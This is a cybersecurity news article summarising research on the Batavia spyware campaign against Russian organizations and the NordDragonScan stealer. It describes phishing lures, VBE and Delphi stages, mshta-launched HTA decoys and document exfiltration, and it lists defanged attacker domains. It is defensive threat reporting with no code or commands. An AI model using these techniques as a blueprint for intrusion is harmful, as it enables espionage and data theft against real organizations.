A new and previously undocumented Windows spyware, dubbed Batavia, has been actively targeting Russian organizations since July 2024 as part of a sophisticated cyber espionage campaign. Security researchers at Kaspersky have been tracking the activity, which appears to focus on the exfiltration of sensitive internal documents.
Batavia Spyware Targets Russian Organizations
The campaign commences with deceptive phishing emails masquerading as contract proposals, originating from the domain “oblast-ru[.]com,” which is reportedly controlled by the attackers. These emails contain malicious links designed to trick recipients into downloading an archive file. Upon execution, this archive deploys a Visual Basic Encoded script (.VBE) that collects system information and sends it to a remote server.
Following the initial compromise, the attackers retrieve a second-stage payload, an executable developed in Delphi. This malware display what is believed to be a fake contract to the victim as a distraction while it covertly gathers system logs, various office document formats, and takes screenshots. Data collection also extends to any removable devices connected to the infected host.
The Delphi malware possesses the capability to download additional binaries from the remote server, broadening its data exfiltration scope. These secondary payloads target a wider range of file extensions, including images, emails, presentations, archives, and text-based documents. The newly acquired data is then transmitted to a separate domain, “ru-exchange[.]com,” where a further, unknown executable is downloaded to perpetuate the attack chain.
Telemetry data gathered by Kaspersky indicates that over 100 individuals across numerous organizations have fallen victim to these phishing emails in the past year. The primary objective of Batavia appears to be the comprehensive theft of victim documents alongside system-level information, such as installed programs, drivers, and operating system components.
Broader Trends in Windows Malware Delivery
The emergence of Batavia highlights a persistent threat landscape for Windows users. In parallel, Fortinet FortiGuard Labs has detailed a separate malicious campaign distributing a Windows stealer malware codenamed NordDragonScan. While the exact entry point for NordDragonScan is not definitively known, it is suspected to involve phishing emails that direct users to download an RAR archive.
Once installed, NordDragonScan is designed to scan compromised systems, copy documents, harvest entire user profiles from both Google Chrome and Mozilla Firefox browsers, and capture screenshots. This multifaceted approach suggests a broad objective of intelligence gathering and potential espionage.
The RAR archive associated with NordDragonScan contains a Windows shortcut (.LNK) file that discreetly utilizes “mshta.exe” to execute a remotely hosted HTML Application (HTA). This step serves to display a benign decoy document to the user, while a malicious .NET payload is stealthily installed on the system in the background. The stolen information is then exfiltrated to a remote server via HTTP POST requests.
The ongoing development and deployment of sophisticated spyware like Batavia and stealer malware such as NordDragonScan underscore the evolving tactics of threat actors. Organizations are advised to maintain vigilant cybersecurity practices, including up-to-date threat intelligence, robust endpoint detection, and comprehensive user awareness training to mitigate the risks associated with these evolving threats.